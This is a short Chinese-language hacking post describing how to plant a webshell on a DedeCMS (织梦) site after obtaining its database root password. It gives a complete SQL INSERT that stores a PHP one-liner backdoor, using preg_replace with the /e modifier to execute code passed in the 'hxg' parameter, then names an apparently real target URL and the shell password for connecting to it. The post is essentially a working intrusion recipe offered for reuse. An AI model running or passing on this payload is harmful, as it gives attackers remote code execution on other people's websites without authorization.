织梦站通过操作数据库拿下webshell

某次得到某站的root密码,找不到后台,


导出不了一句话到网站目录,于是用此方法拿下shell


执行sql语句:

INSERT INTO `saisfy`.`sfymytag` (`aid`, `typeid`, `tagname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES ('96', '0', '', '0', '0', '0', '<?php echo ''dedecms 5.7 0day<br>hxg, 96sec.org'';@preg_replace(''/[copyright]/e'',$_REQUEST[''hxg''],''error'');?>', NULL);


数据库名是:saisfy

表名:sfymytag


自行更改,


成功插入后连接:http://www.sais.cn/plus/mytag_js.php?aid=96

一句话密码:hxg


评论回复